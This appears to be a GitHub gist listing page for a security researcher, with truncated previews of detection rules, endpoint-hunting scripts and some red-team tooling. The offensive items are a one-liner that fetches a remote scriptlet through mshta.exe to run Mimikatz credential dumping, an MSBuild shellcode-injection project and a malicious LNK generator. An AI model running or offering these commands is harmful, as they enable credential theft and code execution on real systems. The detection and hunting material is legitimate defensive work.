Skip to content

Instantly share code, notes, and snippets.

@vector-sec
vector-sec / detection.yml
Created May 31, 2022 — forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
View detection.yml
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
@vector-sec
vector-sec / binary_analysis_hunting.py
Created Jul 2, 2021 — forked from rc-abodkins/binary_analysis_hunting.py
This script searches binaries within VMware Carbon Black EDR
View binary_analysis_hunting.py
import argparse
import os
import configparser
import csv
import sys
from os.path import exists
import requests
#Console Output coloring. Makes knowing if you have any errors/ warnings easier to identify
err_Col = '\033[91m'
View gist:0f0e23961ed5eddfce60a9559683ea54
### Keybase proof
I hereby claim:
* I am vector-sec on github.
* I am vector_sec (https://keybase.io/vector_sec) on keybase.
* I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611
To claim this, I am signing this object:
@vector-sec
vector-sec / mimikatz.sct
Created Jan 18, 2018
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
View mimikatz.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
View Get-Doppelgangers.ps1
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@vector-sec
vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953
Created Nov 28, 2017
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
View gist:9caa8e14b2adba7ab0c215a6bf856953
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
$hdrs = @{}
$hdrs.Add("X-Auth-Token",$APIKey)
$response = Invoke-RestMethod -Uri $url -Headers $hdrs
for($i =0; $i -lt $response.total_results; $i++)
{
@vector-sec
vector-sec / msbuildQueueAPC.csproj
Created Aug 30, 2017
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
View msbuildQueueAPC.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@vector-sec
vector-sec / Get-Token.ps1
Created Aug 10, 2017
PowerShell script to enumerate all Process and Thread tokens.
View Get-Token.ps1
function Get-Token
{
foreach($proc in (Get-Process))
{
if($proc.Id -ne 0 -and $proc.Id -ne 4)
{
try
{
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
}
View Create-LNK.ps1
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicous LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
@vector-sec
vector-sec / Get-InjectedThread.ps1
Created May 10, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION